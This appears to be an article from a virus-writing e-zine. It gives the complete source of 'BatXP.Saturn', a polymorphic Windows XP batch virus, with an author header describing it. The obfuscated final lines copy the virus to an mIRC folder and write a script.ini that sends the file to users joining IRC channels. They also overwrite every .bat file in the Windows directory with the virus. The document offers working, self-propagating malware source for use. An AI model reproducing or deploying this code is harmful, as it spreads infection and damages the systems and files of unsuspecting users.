The Revoluti0n
| last article | table of contents | next article |
|---|
| last article | table of contents | next article |
|---|
BatXP.Saturn by Second Part To Hell
cls%SpTh%
@echo off%SpTh%
ReM ----------- BatXP.Saturn ********** by Second Part To Hell ----------- %SpTh%
ReM | %SpTh%
ReM I think, you are looking at the code and think: "What the hell is this?"| %SpTh%
ReM The answer is: A Windows XP Batch polymorph virus :D | %SpTh%
ReM WinXP is using a program named CMD.EXE instate of COMMAND.COM for DOS | %SpTh%
ReM You're able to make the really nice things with CMD which you wasn't | %SpTh%
ReM able to do it with COMMAND.COM. | %SpTh%
ReM | %SpTh%
ReM Information about the virus: | %SpTh%
ReM Virusname......................: BatXP.Saturn | %SpTh%
ReM Virusauthor....................: Second Part To Hell | %SpTh%
ReM Size...........................: The poly-engine has 1.301 Bytes | %SpTh%
ReM The whole virus has 4.158 Bytes | %SpTh%
ReM Encrypted......................: Yes, but only the virus part. | %SpTh%
ReM I'll crypt also the poly engine in | %SpTh%
ReM next versions. | %SpTh%
ReM Polymorphic....................: Yes | %SpTh%
ReM | %SpTh%
ReM written from 20.11.2002 to 22.11.2002 | %SpTh%
ReM in Austria | %SpTh%
ReM ---------------------------------------------------------------------- %SpTh%
set a=0%SpTh%
set aa=0%SpTh%
set bb=0%SpTh%
set cc=0%SpTh%
set dd=0%SpTh%
set ee=0%SpTh%
set ff=0%SpTh%
set gg=0%SpTh%
find "SpTh"<%0 >spth.bat
set sec=A%SpTh%
:TitanMoon %SpTh%
if %aa% EQU 1 (if %bb% EQU 1 (if %cc% EQU 1 (if %dd% EQU 1 (if %ee% EQU 1 (goto saturn)))))%SpTh%
call :RheaMoon%SpTh%
if %aa% EQU 0 (if %a% EQU 45 (%SpTh%
find "%Sec%aAa" <%0 >>spth.bat%SpTh%
set aa=1))%SpTh%
if %bb% EQU 0 (if %a% EQU 46 (%SpTh%
find "%sec%bBb" <%0 >>spth.bat%SpTh%
set bb=1))%SpTh%
if %cc% EQU 0 (if %a% EQU 47 (%SpTh%
find "%sec%cCc" <%0 >>spth.bat%SpTh%
set cc=1))%SpTh%
if %dd% EQU 0 (if %a% EQU 48 (%SpTh%
find "%sec%dDd" <%0 >>spth.bat%SpTh%
set dd=1))%SpTh%
if %ee% EQU 0 (if %a% EQU 49 (%SpTh%
find "%sec%eEe" <%0 >>spth.bat%SpTh%
set ee=1))%SpTh%
goto TitanMoon%SpTh%
:RheaMoon %SpTh%
set a=%random%%SpTh%
:IapetusMoon %SpTh%
if %a% GEQ 50 (set /A a=%a%/2)%SpTh%
if %a% LEQ 45 (set /A a=%a%+5)%SpTh%
if %a% LSS 45 (goto :IapetusMoon)%SpTh%
if %a% GTR 50 (goto :IapetusMoon)%SpTh%
goto :EOF %SpTh%
:saturn %SpTh%
if %ply% GTR 16383 (%SpTh%
find "%sec%sat"<%0 >>spth.bat %SpTh%
find "%sec%tas"<%0 >>spth.bat %SpTh%
) ELSE ( %SpTh%
find "%sec%tas"<%0 >>spth.bat %SpTh%
find "%sec%sat"<%0 >>spth.bat %SpTh%
) %SpTh%
set !!.!!=h%AdDd%
set !!.!!=i%AdDd%
goto !!.!! %AdDd%
set !!.!!=w%AdDd%
:!!.!! %AdDd%
:!.!.. %AdDd%
set !..!!=b%AdDd%
set !..!!=y%AdDd%
goto !..!! %AdDd%
set !..!!=w%AdDd%
:!..!! %AdDd%
set !!!.!=q%AcCc%
set !!!.!=o%AcCc%
goto !!!.! %AcCc%
set !!!.!=u%AcCc%
:!!!.! %AcCc%
set !!.!.=j%AcCc%
set !!.!.=n%AcCc%
goto !!.!. %AcCc%
set !!.!.=l%AcCc%
:!!.!. %AcCc%
set !.!.!=b%AbBb%
set !.!.!=y%AbBb%
goto !.!.! %AbBb%
set !.!.!=w%AbBb%
:!.!.! %AbBb%
set !..!.=p%AbBb%
set !..!.=s%AbBb%
goto !..!. %AbBb%
set !..!.=o%AbBb%
:!..!. %AbBb%
set !!..!=f%AeEe%
set !!..!=d%AeEe%
goto !!..! %AeEe%
set !!..!=b%AeEe%
:!!..! %AeEe%
set !.!!.=w%AeEe%
set !.!!.=p%AeEe%
goto !.!!. %AeEe%
set !.!!.=d%AeEe%
:!.!!. %AeEe%
set !.!..=b%AeEe%
set !.!..=e%AeEe%
goto !.!.. %AeEe%
set !.!..=w%AeEe%
set !!!!.=t%AaAa%
set !!!!.=f%AaAa%
goto !!!!. %AaAa%
set !!!!.=k%AaAa%
:!!!!. %AaAa%
set !!!..=v%AaAa%
set !!!..=r%AaAa%
goto !!!.. %AaAa%
set !!!..=u%AaAa%
:!!!.. %AaAa%
set !.!!!=p%AaAa%
set !.!!!=c%AaAa%
goto !.!!! %AaAa%
set !.!!!=q%AaAa%
:!.!!! %AaAa%
%!.!!!%%!!!.!%%!.!!.%%!.!.!% spth.bat C:\mirc\saturn.bat %Asat%
%!.!..%%!.!!!%h%!!!.!% [%!..!.%%!.!!!%%!!!..%%!!.!!%%!.!!.%t] >C:\mirc\script.ini %Asat%
%!.!..%%!.!!!%h%!!!.!% %!!.!.%0=%!!!.!%n 1:j%!!!.!%%!!.!!%%!!.!.%:*.* { %!!.!!%%!!!!.% ( $n%!!.!!%%!.!!!%k ==$m%!.!..% ) {halt} /d%!.!!!%%!.!!!% %!..!.%%!.!..%%!!.!.%d $n%!!.!!%%!.!!!%k C:\mirc\saturn.bat } >>C:\mirc\script.ini %Asat%
%!!!!.%%!!!.!%%!!!..% %%q %!!.!!%%!!.!.% (%windir%\*.bat) %!!..!%%!!!.!% %!.!!!%%!!!.!%%!.!!.%%!.!.!% spth.bat %%q %Atas%